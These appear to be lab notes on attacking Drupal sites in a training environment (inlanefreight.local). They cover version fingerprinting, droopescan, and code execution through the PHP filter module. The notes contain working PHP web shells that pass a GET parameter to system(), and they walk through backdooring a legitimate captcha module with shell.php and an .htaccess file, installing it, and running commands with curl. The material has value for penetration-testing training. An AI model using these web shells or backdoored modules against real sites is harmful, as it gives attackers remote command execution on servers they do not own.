Drupal Attack

curl -s http://drupal.inlanefreight.local | grep Drupal

curl -s http://drupal-acc.inlanefreight.local/CHANGELOG.txt | grep -m2 ""

droopescan scan drupal -u http://drupal-qa.inlanefreight.local

http://drupal-qa.inlanefreight.local/#overlay=admin/modules

From here, we could tick the check box next to the module and scroll down to Save configuration. Next, we could go to Content --> Add content and create a Basic page.

http://drupal-qa.inlanefreight.local/#overlay=node/add

<?php
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);
?>

http://drupal-qa.inlanefreight.local/#overlay=node/add/page

wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

http://drupal.inlanefreight.local/admin/reports/updates/install

From here, click on Browse, select the file from the directory we downloaded it to, and then click Install.
Once the module is installed, we can click on Content and create a new basic page, similar to how we did in the Drupal 7 example. Again, be sure to select PHP code from the Text format dropdown.

wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz

tar xvf captcha-8.x-1.2.tar.gz

<?php
system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);
?>

Next, we need to create a .htaccess file to give ourselves access to the folder.
- This is necessary as Drupal denies direct access to the /modules folder.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

mv shell.php .htaccess captcha

tar cvf captcha.tar.gz captcha/

Assuming we have administrative access to the website, click on Manage and then Extend on the sidebar
- Next, click on the + Install new module button, and we will be taken to the install page, such as http://drupal.inlanefreight.local/admin/modules/install
- Browse to the backdoored Captcha archive and click Install.

curl -s drupal.inlanefreight.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id

Last updated 10 months ago